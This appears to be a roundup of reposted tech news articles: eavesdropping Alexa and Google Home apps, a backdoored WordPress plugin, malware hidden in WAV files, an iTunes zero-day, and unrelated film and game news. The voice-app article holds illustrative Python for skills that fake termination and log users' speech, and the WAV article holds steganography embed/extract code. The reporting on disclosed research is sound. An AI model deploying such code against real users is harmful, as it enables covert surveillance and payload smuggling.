Alexa and Google Home abused to eavesdrop and phish passwords
Amazon- and Google-approved apps turned both voice-controlled devices into “smart spies.”
By now, the privacy threats posed by Amazon Alexa and Google Home are common knowledge. Workers for both companies routinely listen to audio of users—recordings of which can be kept forever—and the sounds the devices capture can be used in criminal trials.
Now, there’s a new concern: malicious apps developed by third parties and hosted by Amazon or Google. The threat isn’t just theoretical. Whitehat hackers at Germany’s Security Research Labs developed eight apps—four Alexa “skills” and four Google Home “actions”—that all passed Amazon or Google security-vetting processes. The skills or actions posed as simple apps for checking horoscopes, with the exception of one, which masqueraded as a random-number generator. Behind the scenes, these “smart spies,” as the researchers call them, surreptitiously eavesdropped on users and phished for their passwords.
“It was always clear that those voice assistants have privacy implications—with Google and Amazon receiving your speech, and this possibly being triggered on accident sometimes,” Fabian Bräunlein, senior security consultant at SRLabs, told me. “We now show that, not only the manufacturers, but… also hackers can abuse those voice assistants to intrude on someone’s privacy.”
The malicious apps had different names and slightly different ways of working, but they all followed similar flows. A user would say a phrase such as: “Hey Alexa, ask My Lucky Horoscope to give me the horoscope for Taurus” or “OK Google, ask My Lucky Horoscope to give me the horoscope for Taurus.” The eavesdropping apps responded with the requested information while the phishing apps gave a fake error message. Then the apps gave the impression they were no longer running when they, in fact, silently waited for the next phase of the attack.
In two demonstration videos, the eavesdropping apps gave the expected responses and then went silent. In one case, an app went silent because the task was completed, and, in another, because the user gave the command “stop,” which Alexa uses to terminate apps. In both cases, the apps quietly logged all conversations within earshot of the device and sent a copy to a developer-designated server.
The phishing apps follow a slightly different path, responding with an error message that claims the skill or action isn’t available in the user’s country. They then go silent to give the impression the app is no longer running. After about a minute, the apps use a voice that mimics the ones used by Alexa and Google Home to falsely claim a device update is available and prompt the user for a password to install it.
SRLabs eventually took down all four apps demoed. More recently, the researchers developed four German-language apps that worked similarly. All eight of them passed inspection by Amazon and Google. The four newer ones were taken down only after the researchers privately reported their results to Amazon and Google. As with most skills and actions, users didn’t need to download anything. Simply saying the proper phrases into a device was enough for the apps to run.
All of the malicious apps used common building blocks to mask their malicious behaviors. The first was exploiting a flaw in both Alexa and Google Home when their text-to-speech engines received instructions to speak the character sequence U+D801, dot, space. Because U+D801 is an unpronounceable, unpaired Unicode surrogate, both devices remained silent even while the apps were still running, giving the impression the apps had terminated.
The apps used other tricks to deceive users. In the parlance of voice apps, “Hey Alexa” and “OK Google” are known as “wake” words that activate the devices; “My Lucky Horoscope” is an “invocation” phrase used to start a particular skill or action; “give me the horoscope” is an “intent” that tells the app which function to call; and “taurus” is a “slot” value that acts like a variable. After the apps received initial approval, the SRLabs developers manipulated intents such as “stop” and “start” to give them new functions that caused the apps to listen and log conversations.
Others at SRLabs who worked on the project include security researcher Luise Frerichs and Karsten Nohl, the firm’s chief scientist. In a post documenting the apps, the researchers explained how they developed the Alexa phishing skills:
1. Create a seemingly innocent skill that already contains two intents:
– an intent that is started by “stop” and copies the stop intent
– an intent that is started by a certain, commonly used word and saves the following words as slot values. This intent behaves like the fallback intent.
2. After Amazon’s review, change the first intent to say goodbye, but then keep the session open and extend the eavesdrop time by adding the character sequence “(U+D801, dot, space)” multiple times to the speech prompt.
3. Change the second intent to not react at all
When the user now tries to end the skill, they hear a goodbye message, but the skill keeps running for several more seconds. If the user starts a sentence beginning with the selected word in this time, the intent will save the sentence as slot values and send them to the attacker.
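The flow above can be sketched in code. What follows is an illustrative reconstruction (not SRLabs’ actual code) of the two manipulated intents, assuming a Python skill backend; the response dictionaries follow the general Alexa Skills Kit JSON shape, and the slot and handler names are hypothetical.

```python
captured = []  # stand-in for an attacker-controlled server

# A lone surrogate (U+D801) followed by ". " renders as silence on the device.
SILENT_PAD = "\ud801. " * 40

def handle_stop_intent(request):
    """Say goodbye, pad the speech with silence, and keep the session open."""
    return {
        "version": "1.0",
        "response": {
            "outputSpeech": {
                "type": "SSML",
                "ssml": "<speak>Goodbye!" + SILENT_PAD + "</speak>",
            },
            # The crucial part: the session stays open after "goodbye".
            "shouldEndSession": False,
        },
    }

def handle_fallback_intent(request):
    """Save whatever the user said next as a slot value and log it."""
    utterance = (request.get("intent", {})
                        .get("slots", {})
                        .get("phrase", {})
                        .get("value", ""))
    captured.append(utterance)  # a real attack would POST this to a server
    return {
        "version": "1.0",
        "response": {
            "outputSpeech": {"type": "PlainText", "text": ""},
            "shouldEndSession": False,
        },
    }
```

The user hears only “Goodbye!”; the unpronounceable padding keeps the device silent while `shouldEndSession: False` keeps the microphone hot for the fallback intent.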
To develop the Google Home eavesdropping actions:
1. Create an Action and submit it for review.
2. After review, change the main intent to end with the Bye earcon sound (by playing a recording using the Speech Synthesis Markup Language (SSML)) and set expectUserResponse to true. This sound is usually understood as signaling that a voice app has finished. After that, add several noInputPrompts consisting only of a short silence, using the SSML <break> element or the unpronounceable Unicode character sequence (U+D801, dot, space).
3. Create a second intent that is called whenever an actions.intent.TEXT request is received. This intent outputs a short silence and defines several silent noInputPrompts.
After outputting the requested information and playing the earcon, the Google Home device waits for approximately 9 seconds for speech input. If none is detected, the device “outputs” a short silence and waits again for user input. If no speech is detected within 3 iterations, the Action stops.
When speech input is detected, a second intent is called. This intent only consists of one silent output, again with multiple silent reprompt texts. Every time speech is detected, this Intent is called and the reprompt count is reset.
The hacker receives a full transcript of the user’s subsequent conversations, until there is at least a 30-second break of detected speech. (This can be extended by extending the silence duration, during which the eavesdropping is paused.)
In this state, the Google Home Device will also forward all commands prefixed by “OK Google” (except “stop”) to the hacker. Therefore, the hacker could also use this hack to imitate other applications, man-in-the-middle the user’s interaction with the spoofed Actions, and start believable phishing attacks.
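The steps above can be sketched as webhook responses. This is a simplified illustration only: the field names loosely follow the Actions on Google conversation webhook format but are an approximation, and the earcon URL is hypothetical.

```python
# Unpronounceable padding (U+D801, dot, space) renders as silence on the device.
SILENT_SSML = "<speak>" + "\ud801. " * 20 + "</speak>"
SILENT_PROMPT = {"ssml": SILENT_SSML}

def main_intent_response():
    """Play the 'Bye' earcon, then keep the microphone open with silent reprompts."""
    earcon = ('<speak><audio src="https://example.com/bye-earcon.ogg"/>'
              + "\ud801. " * 20 + "</speak>")  # hypothetical earcon recording
    return {
        "expectUserResponse": True,  # session stays open after the earcon
        "richResponse": {"items": [{"simpleResponse": {"ssml": earcon}}]},
        # Three silent no-input prompts before the Action finally stops.
        "noInputPrompts": [SILENT_PROMPT] * 3,
    }

def text_intent_response(transcript, captured):
    """Handle every actions.intent.TEXT request: log the speech, answer with silence."""
    captured.append(transcript)  # stand-in for forwarding to the attacker's server
    return {
        "expectUserResponse": True,
        "richResponse": {"items": [{"simpleResponse": SILENT_PROMPT}]},
        "noInputPrompts": [SILENT_PROMPT] * 3,  # reprompt count resets on each call
    }
```

Because the text intent fires on every utterance and resets the reprompt counter, the Action keeps transcribing until the user stays quiet long enough for the silent prompts to run out.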
SRLabs privately reported the results of its research to Amazon and Google. In response, both companies removed the apps and said they are changing their approval processes to prevent skills and actions from having similar capabilities in the future. Amazon representatives provided the following statement and FAQ:
Customer trust is important to us, and we conduct security reviews as part of the skill certification process. We quickly blocked the skill in question and put mitigations in place to prevent and detect this type of skill behavior and reject or take them down when identified.
On the record Q&A:
1) Why is it possible for the skill created by the researchers to get a rough transcript of what a customer says after they said “stop” to the skill?
This is no longer possible for skills being submitted for certification. We have put mitigations in place to prevent and detect this type of skill behavior and reject or take them down when identified.
2) Why is it possible for SR Labs to prompt skill users to install a fake security update and then ask them to enter a password?
We have put mitigations in place to prevent and detect this type of skill behavior and reject or take them down when identified. This includes preventing skills from asking customers for their Amazon passwords.
It’s also important that customers know we provide automatic security updates for our devices, and will never ask them to share their password.
Google representatives, meanwhile, wrote:
All Actions on Google are required to follow our developer policies, and we prohibit and remove any Action that violates these policies. We have review processes to detect the type of behavior described in this report, and we removed the Actions that we found from these researchers. We are putting additional mechanisms in place to prevent these issues from occurring in the future.
Google didn’t say what these additional mechanisms are. On background, a representative said company employees are conducting a review of all third-party actions available from Google, and during that time, some may be paused temporarily. Once the review is completed, actions that passed will once again become available.
It’s encouraging that Amazon and Google have removed the apps and are strengthening their review processes to prevent similar apps from becoming available. But SRLabs’ success raises serious concerns. Google Play has a long history of hosting malicious apps that push sophisticated surveillance malware—in at least one case, researchers said, so that Egypt’s government could spy on its own citizens. Other malicious Google Play apps have stolen users’ cryptocurrency and executed secret payloads. These kinds of apps have routinely slipped through Google’s vetting process for years.
There’s little or no evidence third-party apps are actively threatening Alexa and Google Home users now, but the SRLabs research suggests that possibility is by no means farfetched. I’ve long remained convinced that the risks posed by Alexa, Google Home, and other always-listening devices outweigh their benefits. SRLabs’ Smart Spies research only adds to my belief that these devices shouldn’t be trusted by most people.
Read the original article over at ArsTechnica.com.
Fake WordPress Plugin Comes with Cryptocurrency Mining Function
Malicious plugins for WordPress websites are being used not just to maintain access on the compromised server but also to mine for cryptocurrency.
Researchers at website security company Sucuri noticed the number of malicious plugins increase over the past months. The components are clones of legitimate software, altered for nefarious purposes.
Normally, these fake plugins are used to give attackers access to the server even after the infection vector is removed. But they can include code for other purposes, too, such as encrypting content on a blog.
One of the plugins discovered by Sucuri to have a double purpose is a clone of “wpframework.” It was found in September and attackers used it to “gain and maintain unauthorized access to the site environment,” the researchers say.
It is unclear which plugin it impersonates; a plugin with this name exists in the WordPress public repository, though its development seems to have stopped in 2011. Despite this, it still has more than 400 active installations.
Apart from scanning for functions that allow command execution at the server level and restricting this privilege to the botmaster, the plugin also carried code to run a Linux binary that mines for cryptocurrency.
When the researchers checked the referenced domain hosting the binary it was no longer active. However, the backdoor functionality of the component was still present.
The mining component was added to the VirusTotal scanning platform on September 18 and is currently detected by 25 out of 56 engines.
Generating malicious plugins
Although Sucuri does not provide details about the reason for the increased frequency of malicious plugins, it is worth noting that creating them takes little effort.
Instead of creating a malicious WordPress plugin from scratch, attackers can modify the code of an existing one to include malicious components.
Additionally, automated tools exist that can generate a plugin with a name given by the attacker and lace it with an arbitrary payload, such as a reverse shell.
Furthermore, the web offers the necessary tutorials for low-skilled attackers to learn how to create these fake website components.
Sucuri advises webmasters to also check additional site components when doing a malware cleanup, since the procedure is often limited to WordPress core files. Themes and plugins are frequently migrated without any prior scrutiny; this way, attackers maintain their grip on the new site through the backdoor planted in third-party extensions.
Read the original article over at BleepingComputer.com.
WAV audio files are now being used to hide malicious code
Steganography malware trend moving from PNG and JPG to WAV files.
Two reports published in the last few months show that malware operators are experimenting with using WAV audio files to hide malicious code.
The technique is known as steganography — the art of hiding information in plain sight, in another data medium.
In the software field, steganography — also referred to as stego — is used to describe the process of hiding files or text in another file, of a different format. For example, hiding plain text inside an image’s binary format.
Using steganography has been popular with malware operators for more than a decade. Malware authors don’t use steganography to breach or infect systems, but rather as a transfer method. Steganography allows files hiding malicious code to bypass security software that whitelists non-executable file formats (such as multimedia files).
All previous instances where malware used steganography revolved around image file formats, such as PNG or JPEG.
The novelty in the two recently-published reports is the use of WAV audio files, not seen abused in malware operations until this year.
The two reports
The first of these two new malware campaigns abusing WAV files was reported back in June. Symantec security researchers said they spotted a Russian cyber-espionage group known as Waterbug (or Turla) using WAV files to hide and transfer malicious code from their server to already-infected victims.
The second malware campaign was spotted this month by BlackBerry Cylance. In a report published today and shared with ZDNet last week, Cylance said it saw something similar to what Symantec saw a few months before.
But while the Symantec report described a nation-state cyber-espionage operation, Cylance said they saw the WAV steganography technique being abused in a run-of-the-mill crypto-mining malware operation.
Cylance said this particular threat actor was hiding DLLs inside WAV audio files. Malware already present on the infected host would download and read the WAV file, extract the DLL bit by bit, and then run it, installing a cryptocurrency miner application named XMRig.
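One common way to hide a payload “bit by bit” in audio is least-significant-bit (LSB) steganography: each payload bit replaces the low bit of one PCM sample, which is inaudible in 16-bit audio. The sketch below works on a plain list of sample values (a real WAV would be parsed with, e.g., Python’s wave module) and is a generic illustration of the technique, not a reconstruction of the actual malware.

```python
def embed(samples, payload):
    """Hide `payload` bytes in the least significant bits of `samples`."""
    bits = [(byte >> i) & 1 for byte in payload for i in range(8)]
    assert len(bits) <= len(samples), "payload too large for carrier"
    out = list(samples)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & ~1) | bit  # clear the low bit, set the payload bit
    return out

def extract(samples, nbytes):
    """Recover `nbytes` hidden bytes from the LSBs of `samples`."""
    data = bytearray()
    for b in range(nbytes):
        byte = 0
        for i in range(8):
            byte |= (samples[b * 8 + i] & 1) << i
        data.append(byte)
    return bytes(data)
```

Because each sample changes by at most 1, the carrier still plays back as ordinary audio, which is exactly why the format passes through filters that whitelist multimedia files.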
Josh Lemos, VP of Research and Intelligence at BlackBerry Cylance, told ZDNet in an email yesterday that this malware strain using WAV steganography was spotted on both Windows desktop and server instances.
The commoditization of steganography
Lemos also told us that this appears to be the first time a crypto-mining malware strain has been seen abusing steganography, regardless of whether the carrier was a PNG, JPEG, or WAV file.
This shows that even mundane crypto-mining malware authors are growing in sophistication as they learn from other operations.
“The use of stego techniques requires an in-depth understanding of the target file format,” Lemos told ZDNet. “It is generally used by sophisticated threat actors that want to remain undetected for a long period of time.
“Developing a stego technique takes time, and several blogs have detailed how threat actors such as OceanLotus or Turla implemented payload hiding,” Lemos added.
“These publications make it possible for other threat actors to grasp the technique and use it as they see fit.”
In other words, the act of documenting and studying steganography comes with a snowball effect that also commoditizes the technique for lower-skilled malware operations.
But while Symantec and Cylance’s work on documenting WAV-based steganography might help other malware operators, WAV, PNG, and JPG files aren’t the only file formats that can be abused.
“Stego can be used with any file format as long as the attacker adheres to the structure and constraints of the format so that any modifications performed on the targeted file do not break its integrity,” Lemos said.
In other words, defending against steganography by blocking vulnerable file formats is not the correct solution, as companies would end up blocking the download of many popular formats, like JPEG, PNG, BMP, WAV, GIF, WebP, TIFF, and loads more, wreaking havoc on internal networks and making it impossible to navigate the modern internet.
A proper way of dealing with steganography is… not dealing with it at all. Since stego is only used as a data transfer method, companies should be focusing on detecting the point of entry/infection of the malware that abuses steganography, or the execution of the unauthorized code spawned by the stego-laced files.
Read the original article over at ZDNet.com.
Man agrees to pay $25,000 for abusing YouTube’s takedown system
Man allegedly tried to extort payments of up to $300 with bogus takedown threats.
A Nebraska man has agreed to pay $25,000 for abusing YouTube’s takedown system under the Digital Millennium Copyright Act, YouTube said in an emailed statement Tuesday. The man, Christopher Brady, also signed a public apology admitting to “falsely claiming that material uploaded by YouTube users infringed my copyrights.”
In reality, Brady didn’t have any legitimate claim to the material, YouTube charged in an August lawsuit. YouTube said that Brady targeted at least three well-known Minecraft streamers with a series of takedown requests.
Under YouTube’s rules, a series of three takedown requests in a short period of time can lead to the loss of a YouTube account—a serious penalty for someone who has built up a large following on the platform. According to YouTube, Brady would submit two bogus takedown requests against a target’s videos. Then he would send the victim a message demanding payments—$150 in one case, $300 in another—to prevent the submission of a third request. For some reason, Brady allegedly offered victims a discount if they paid with bitcoin.
In an even more outrageous incident, Brady allegedly used the takedown process to obtain a victim’s home address—information that copyright holders are supposed to use to file copyright infringement lawsuits. Instead, YouTube believes that Brady “swatted” the target—calling law enforcement to report a fake hostage situation. The company, however, admitted it didn’t have hard evidence Brady made the swatting call.
Brady’s apology acknowledges sending “dozens” of bogus takedown requests, suggesting that he sent out many more notices than those detailed in YouTube’s August lawsuit.
“This settlement highlights the very real consequences for those that misuse our copyright system,” a YouTube spokesman told Ars. “We’ll continue our work to prevent abuse of our systems.”
Read the original article over at ArsTechnica.com.
Thousands of DOS games have been added to the Internet Archive
It’s the biggest update since games first hit the archive.
The Internet Archive has been updated with more than 2,500 DOS games, marking the most significant addition of games to the archive since 2015.
New additions include forgotten classics like Wizardry: Crusaders of the Dark Savant, Princess Maker 2, and Microsoft Adventure, a rebranding of Colossal Cave Adventure. They also include a whole lot of weird, early experiments and dead ends that should be fascinating for historians, technologists, game designers, and players alike to explore.
The blog post announcing the additions includes some disclaimers: not all games will run as speedily as one might like, not all games have manuals available (though some do), and frankly, not all games from these bygone eras are enjoyable by modern standards.
But given that many of the games from this era were distributed via floppy disks in plastic bags, preservation seems both an admirable and necessary undertaking. There’s as much value in the fact that these games are hosted somewhere safe as there is in the fact that they’re playable. As technology marches forward, it’s important to remember not to discard the old permanently just because the new is more expedient.
Many of these games were added to the Internet Archive as a result of the eXoDOS game preservation and restoration project. Internet Archive curator Jason Scott had this to say about that project:
What makes the collection more than just a pile of old, now-playable games, is how it has to take head-on the problems of software preservation and history. Having an old executable and a scanned copy of the manual represents only the first few steps. DOS has remained consistent in some ways over the last (nearly) 40 years, but a lot has changed under the hood, and programs were sometimes only written to work on very specific hardware and a very specific setup. They were released, sold some amount of copies, and then disappeared off the shelves, if not everyone’s memories.
It is all these extra steps, under the hood, of acquisition and configuration, that represents the hardest work by the eXoDOS project, and I recognize that long-time and Herculean effort. As a result, the eXoDOS project has over 7,000 titles they’ve made work dependably and consistently.
As game subscription and streaming services take hold, though, it’s worth asking how we’re going to preserve today’s games for future generations.
For more information about the project, as well as some insights into the challenges of adapting CD-ROM games for use in a browser, among other things, head to the Internet Archive and read Scott’s blog post—then play some long-forgotten games.
Read the original article over at ArsTechnica.com.
Attackers exploit an iTunes zeroday to install ransomware
Apple patches actively exploited flaw that let ransomware crooks evade AV protection.
Attackers exploited a zeroday vulnerability in Apple’s iTunes and iCloud programs to infect Windows computers with ransomware without triggering antivirus protections, researchers from Morphisec reported on Thursday. Apple patched the vulnerability earlier this week.
The vulnerability resided in the Bonjour component that both iTunes and iCloud for Windows rely on, according to a blog post. The bug is known as an unquoted service path, which, as its name suggests, occurs when a developer forgets to surround a file path with quotation marks. When the bug is in a trusted program—such as one digitally signed by a well-known developer like Apple—attackers can exploit the flaw to make the program execute code that AV protection might otherwise flag as suspicious.
Morphisec CTO Michael Gorelik explained it this way:
As many detection solutions are based on behavior monitoring, the chain of process execution (parent-child) plays a major role in alert fidelity. If a legitimate process signed by a known vendor executes a new malicious child process, an associated alert will have a lower confidence score than it would if the parent was not signed by a known vendor. Since Bonjour is signed and known, the adversary uses this to their advantage. Furthermore, security vendors try to minimize unnecessary conflicts with known software applications, so they will not prevent this behaviorally for fear of disrupting operations.
In August, Morphisec found attackers were exploiting the vulnerability to install ransomware called BitPaymer on the computers of an unidentified company in the automotive industry. The exploit allowed the attackers to execute a malicious file called “Program,” which presumably was already on the target’s network.
Additionally, the malicious “Program” file doesn’t come with an extension such as “.exe”. This means it is likely that AV products will not scan the file since these products tend to scan only specific file extensions to limit the performance impact on the machine. In this scenario, Bonjour was trying to run from the “Program Files” folder, but because of the unquoted path, it instead ran the BitPaymer ransomware since it was named “Program”. This is how the zero-day was able to evade detection and bypass AV.
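The resolution order behind this bug can be sketched with a few lines of code. This is a simplified model of Windows CreateProcess behavior, not the API itself: when a command line containing spaces is not quoted, Windows tries each space-delimited prefix as the executable and runs the first one that exists, so a file literally named “Program” in C:\ wins before the real binary is ever reached.

```python
def candidate_executables(unquoted_path):
    """Return the paths Windows would try, shortest prefix first."""
    parts = unquoted_path.split(" ")
    return [" ".join(parts[:i]) for i in range(1, len(parts) + 1)]

path = r"C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe"
print(candidate_executables(path)[0])  # -> C:\Program
```

Quoting the path collapses this list to a single candidate, which is the entire fix for an unquoted service path.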
Gorelik said that Morphisec “immediately” notified Apple of the active exploit upon finding it in August. On Monday, Apple patched the vulnerability in both iTunes 12.10.1 for Windows and iCloud for Windows 7.14. Windows users who have either application installed should ensure the automatic updates worked as they’re supposed to. In an email, Gorelik said his company has reported additional vulnerabilities that Apple has yet to patch. Apple representatives didn’t respond to an email seeking comment for this post.
What’s more, anyone who has ever installed and later uninstalled iTunes should inspect their PCs to ensure Bonjour was also removed. That’s because the iTunes uninstaller doesn’t automatically remove Bonjour.
“We were surprised by the results of an investigation that showed the Bonjour updater is installed on a large number of computers across different enterprises,” Gorelik wrote. “Many of the computers uninstalled iTunes years ago while the Bonjour component remains silently, un-updated, and still working in the background.”
An aside: Gorelik described Bonjour as “a mechanism that Apple uses to deliver future updates.” Apple and many other resources, meanwhile, say it’s a service Apple applications use to find shared music libraries and other resources on a local network. In an email, Gorelik said Bonjour serves both functions.
“Moreover in the specific attack, Bonjour was executing the SoftwareUpdate executable that is located under C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe, but instead they executed C:\Program with the rest as parameters -> C:\Program ‘Files’ ‘(x86)\Apple’ ‘Software’ ‘Update\SoftwareUpdate.exe’,” he wrote. He went on to say that Apple developers “haven’t fixed all the vulnerabilities reported by us, only the one that was abused by the attackers.”
Read the original article over at ArsTechnica.com.
From ‘Gemini Man’ to ‘The Irishman’: Dawn of the De-Aged Actor
“It was time to try a digital human,” says Ang Lee of the steep challenge of creating a young Will Smith, as ‘Gemini Man’ and Scorsese’s ‘The Irishman’ push new boundaries of VFX, budgets and, say some, ethics.
While directing Will Smith in Gemini Man, in which the 51-year-old actor stars as an assassin hunted by a clone of his younger self, director Ang Lee made an unusual request of his star. He asked Smith to “act less.”
Lee needed Smith to go back to his less-polished acting roots from the early 1990s in order to capture the performance for his younger clone. But to make Smith look like his youthful self required a whole new level of trickery that saw Lee and his visual effects team create a fully digital CGI 23-year-old Will Smith.
The result: On Oct. 11, audiences will see a Fresh Prince-era Smith trade punches with his present-day self. A few weeks later, septuagenarian screen legends Robert De Niro and Al Pacino will perform together as younger men in Martin Scorsese’s gangster epic The Irishman. As visual effects technologies advance, filmmakers are rethinking the potential of digital humans, particularly as a tool for de-aging actors.
While crafting a believable synthetic human is the most difficult of VFX wizardry, Hollywood saw the possibilities a decade ago when an elderly Brad Pitt aged backward into his youthful prime in David Fincher’s The Curious Case of Benjamin Button. The work won the VFX Oscar that year, but the challenge of aging an actor up or down was still so daunting that it was rarely used outside of limited and specific story needs.
In 2019, nostalgic audiences are seeing several stars appear as their younger selves thanks to a range of VFX techniques, including Samuel L. Jackson in Captain Marvel, Robert Downey Jr. in Avengers: Endgame and Linda Hamilton in the upcoming Terminator: Dark Fate, as she returns to the franchise after 28 years (2015’s Terminator: Genisys likewise featured a de-aged Arnold Schwarzenegger).
But de-aging by creating a synthetic human is still largely uncharted territory, and top VFX artists are using various techniques that present challenges and opportunities for directors, effects artists and even the actors themselves. ILM VFX supervisor Pablo Helman says that upon seeing his digital younger self for the first time in The Irishman, De Niro told him, “You just gave me 30 more years of my career.”
Scorsese knew he needed to wield the full capacity of de-aging magic in order to make The Irishman the way he wanted: that is, with his three leads — De Niro, 75, Joe Pesci, 76, and Al Pacino, 79 — playing their characters through the decades that the story spans. But motion-capture methods of creating an onscreen digital human couldn’t be used on the three veteran actors. “Marty said to me, ‘One thing I know for sure — Bob’s an actor’s actor, Pacino and Pesci as well. They’re not going to wear a helmet with two little cameras and markers all over their faces,’ ” says Helman.
This led to a bold initiative at ILM to develop its performance-capture capabilities so that actors do not have to wear markers on set. Netflix, which made The Irishman for $159 million, and ILM say it involves a three-camera rig with a main camera and two witness cameras, as well as companion software.
“We had taken the technology away from the actor and let the director and the actors do what they need to do,” Helman explains. He adds that particularly with stars such as De Niro and Pacino, they like to act opposite each other and improvise. “That kind of interaction can’t be done in the moment when you have one actor acting against a tennis ball,” he contends. “We didn’t alter any performances. There were changes that were made to the appearance but not the choices they made in the bodies and also in the faces.” Each finished shot was then reviewed by Scorsese. “He would tell us if he felt the same way as he did when he selected the take, and if it would work for the movie.”
For Paramount’s Gemini Man, made for $138 million (plus rebates), Lee took digital human work into a whole new realm. The VFX supervisor, Bill Westenhofer, explains that as the younger and older Smith had to appear together in the same shots, other VFX techniques simply were not an option.
“I believed it was time to try a digital human,” Lee says. “You had to build the character, the detail and really study human details and the performance from our actor. I believe that’s what you have to do if that’s your lead character.”
VFX house Weta gathered images of Smith at a younger age and studied anatomy and terms such as nasolabial folds. “If anything isn’t right, it falls apart,” says Guy Williams, Weta’s VFX supervisor. “We did a deep dive into how light interacts with skin and creating pigments under the layer of skin.”
For shots in which Smith appears with his young clone, Junior, the actor performed first as Henry, with a reference actor of similar physicality playing opposite him as Junior. Then Smith performed Junior’s role on a motion-capture stage opposite a reference actor playing Henry. In scenes in which Henry and Junior are not both in the frame, the team would photograph Smith wearing a facial-capture system and then perform digital face replacement on his body. Action sequences involved fully digital doubles based on stunt performances with face replacement.
Westenhofer says that while getting the eyes right is important to overcome the uncanny valley, every element of the face and body has to be spot-on. “We had in our favor that Will is pretty healthy and still moves pretty youthfully. Making sure the youthfulness came through in the body was a consideration throughout.”
Costs can vary. At the moment, a fully digital human generally starts with the creation of a movable model of the human, explains Darren Hendler, head of VFX house Digital Domain’s digital human group. He estimates that this could cost from $500,000 to $1 million to create. Then, he adds, producers could expect to pay anywhere from $30,000 to $100,000 per shot, depending on the individual requirements of the performance in the scene. VFX pros point out that costs will drop as computers get faster and techniques evolve.
Because of the cost and complexity of creating a digital human, filmmakers often instead use so-called digital cosmetics for de-aging tasks on the actor’s actual image, such as removing wrinkles. This was seen in Marvel’s Avengers: Endgame and Captain Marvel, de-aging Downey and Jackson.
These capabilities raise important ethical questions: When is it appropriate to use an actor’s likeness, and what are an actor’s rights to his or her likeness? That conversation intensified when late actor Robin Williams’ estate put restrictions on the use of his digital likeness, an unusual move.
Westenhofer believes these are discussions that will need to happen, including around how likenesses are used in deepfakes. “For us to do this, it took a team of several hundred artists two years to pull off. We are not close to someone going in their garage and completely fooling someone,” he says.
And then there are questions about how digital humans could affect acting opportunities: performers hired to portray younger versions of lead characters, for instance, may lose that work. Still, Westenhofer is optimistic that digital humans could lead to new stories Hollywood hasn’t yet considered. He says, “Our role is to show that all of these things are possible and allow incredibly talented people with these great imaginations and storytellers to come up with things that we haven’t thought of yet.”
Read the original article courtesy of HollywoodReporter.com.
7 Cybersecurity Threats That Can Sneak Up on You
From rogue USB sticks to Chrome extensions gone wild, here is a quick guide to some basic security risks you should look out for.
There’s a certain kind of security threat that catches the headlines—the massive data breach, or the malware that holds your computer to ransom—but it’s also important to keep your guard up against some of the lesser-known attacks out there too.
These threats may not have the same high profile as an unfixable iOS bug, but they can still do serious damage as far as your data and privacy go. Here’s what to look out for, and how to make sure you aren’t caught out.
Rogue USB Sticks
A small USB stick may not look very dangerous, but these portable drives can carry a major threat—particularly if they’ve been specially engineered, as some are, to start causing havoc as soon as you plug them in. You should be very, very wary of connecting a USB drive to your computer if you’re not absolutely sure where it’s from.
Even if the USB stick isn’t configured to release some kind of payload as soon as it’s attached, it can carry disguised viruses just as easily as an email attachment can. Experiments have shown that we’re often far too curious when we come across USB sticks of unknown origin, so apply some common sense.
Besides being cautious, the usual rules apply for staying safe against this sort of threat: Keep your computer’s operating system up to date, make sure effective security tools are installed, and keep them up to date too. If you’re not sure about the files on a USB drive, run a virus scan on them before doing anything.
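At its simplest, a scan comes down to comparing file fingerprints against a blocklist of known-bad samples; real antivirus engines do far more (signature databases, heuristics, sandboxing). A minimal Python sketch of the hash-matching idea, with a hypothetical `KNOWN_BAD` set you would populate from a regularly updated threat-intelligence feed:

```python
import hashlib
from pathlib import Path

# Hypothetical blocklist of known-bad SHA-256 hashes; a real scanner
# would load these from a regularly updated threat-intelligence feed.
KNOWN_BAD: set[str] = set()

def sha256_of(path: Path) -> str:
    """Hash a file in 64 KB chunks so large files don't exhaust memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def scan(mount_point: str) -> list[Path]:
    """Return every file under mount_point whose hash is on the blocklist."""
    return [p for p in sorted(Path(mount_point).rglob("*"))
            if p.is_file() and sha256_of(p) in KNOWN_BAD]
```

Hash matching only catches files identical to known samples, which is why a proper scanner with heuristic detection is still the tool to reach for.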
Forgotten Online Accounts
In this fast-paced, hyper-connected age, it’s all too easy to forget about all the social media, language-learning, and job-finding apps and sites we’ve signed up for. But every account you leave behind gathering dust is another one that could potentially be hacked into.
As we’ve previously explained in detail, it’s important to take the time to shut down these accounts rather than just uninstalling the associated apps from your phone and forgetting all about them. If any of those services should later suffer a data breach, your data won’t be included.
It’s also worth running a regular audit on the third-party apps and services linked to your main accounts, like dating apps you might have hooked up to Facebook, or email apps connected to your Google account. These give hackers more targets to aim at, which is why you should regularly disconnect and delete the ones you aren’t actively using.
Untrusted Browser Extensions
The right browser extensions are able to add useful functionality and features to your daily window on the web, but these add-ons need to be vetted like any other piece of software—after all, they have the privilege of being able to see everything you’re doing online, if they want to.
Pick the wrong browser extension and you could find it selling your browsing data, or harassing you with pop-up advertising, or installing extra software that you don’t actually want. We’d recommend keeping the number of browser extensions you have installed down to a minimum, and sticking only with the extensions you know and trust.
Identify safe extensions the same way you would identify safe apps: Look into the background of the developers, check the permissions that they ask for, read up on reviews left by other users, and stick to extensions that are actually useful.
Bogus Online Quizzes
You’ve probably seen friends and family take quizzes on Facebook to find out which Hogwarts house they’d get into, or which celebrity they’re most like, and so on. They may seem like harmless fun—and some are—but they can also be used to harvest personal data that you don’t really realize you’re giving away.
These quizzes can be and have been used to build up more detailed profiles of people and their friends, collecting not just the quiz answers themselves but also other information stored in the linked Facebook accounts. Note, too, how often these fun quizzes ask for personal details, like the first road you lived on or the names of your pets, that could be used to impersonate you in some way.
Be wary of anything that requests personal information or personal photos from you—like the recently viral FaceApp app—or that requires a connection to one of your social media accounts: Knowing which President you’re most like probably isn’t worth it.
Leaky Photo Uploads
There’s nothing wrong with posting photos to your favorite social media channels, but think twice about the information that other people can glean from any pictures you make public—particularly the places where you might live and work.
While a lot of apps, like Instagram and Facebook, automatically strip out the location data saved with photos, some, like Google Photos, can keep this data embedded in the file after it’s been shared. Plus, even if the location data is stripped from the image itself, an associated check-in on social media can add the location right back in.
